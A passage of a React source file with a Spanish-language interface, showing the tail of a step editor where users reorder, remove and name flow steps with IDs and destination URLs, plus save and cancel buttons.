                                    <strong style={{ color: '#2196f3' }}>Paso #{index + 1}</strong>
                                    <div>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#666', fontSize: '10px' })}
                                            onClick={function() { moveStep(index, -1); }} disabled={index === 0}>↑</button>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#666', fontSize: '10px' })}
                                            onClick={function() { moveStep(index, 1); }} disabled={index === steps.length - 1}>↓</button>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#f44336', fontSize: '10px' })}
                                            onClick={function() { removeStep(index); }}>X</button>
                                    </div>
                                </div>
                                
                                <label style={styles.label}>Step ID:</label>
                                <input style={styles.input} type="text"
                                    value={step.stepId}
                                    onChange={function(e) { updateStep(index, 'stepId', e.target.value.toLowerCase().replace(/[^a-z0-9-]/g, '')); }}
                                    placeholder="ej: paso1, checkout, success" />
                                
                                <label style={styles.label}>Nombre visible:</label>
                                <input style={styles.input} type="text"
                                    value={step.name}
                                    onChange={function(e) { updateStep(index, 'name', e.target.value); }}
                                    placeholder="ej: Paso 1 - Datos Personales" />
                                
                                <label style={styles.label}>URL destino:</label>
                                <input style={styles.input} type="text"
                                    value={step.url}
                                    onChange={function(e) { updateStep(index, 'url', e.target.value); }}
                                    placeholder="ej: http://misitio.com/paso1" />
                            </div>
                        );
                    })
                )}
                
                <button style={Object.assign({}, styles.button, { backgroundColor: '#4caf50', padding: '10px 20px', fontSize: '13px', marginTop: '10px' })}
                    onClick={addStep}>
                    + Agregar Paso
                </button>
                
                <div style={{ marginTop: '20px', display: 'flex', gap: '10px' }}>
                    <button style={Object.assign({}, styles.button, { backgroundColor: '#4caf50', padding: '12px 24px', fontSize: '14px' })}
                        onClick={handleSave}
                        disabled={props.saving}>
                        {props.saving ? 'Guardando...' : 'Guardar Pasos'}
                    </button>
                    <button style={Object.assign({}, styles.button, { backgroundColor: '#666', padding: '12px 24px', fontSize: '14px' })}
                        onClick={props.onClose}>
                        Cancelar
                    </button>
                </div>
            </div>
        </div>
    );
}

export default App;
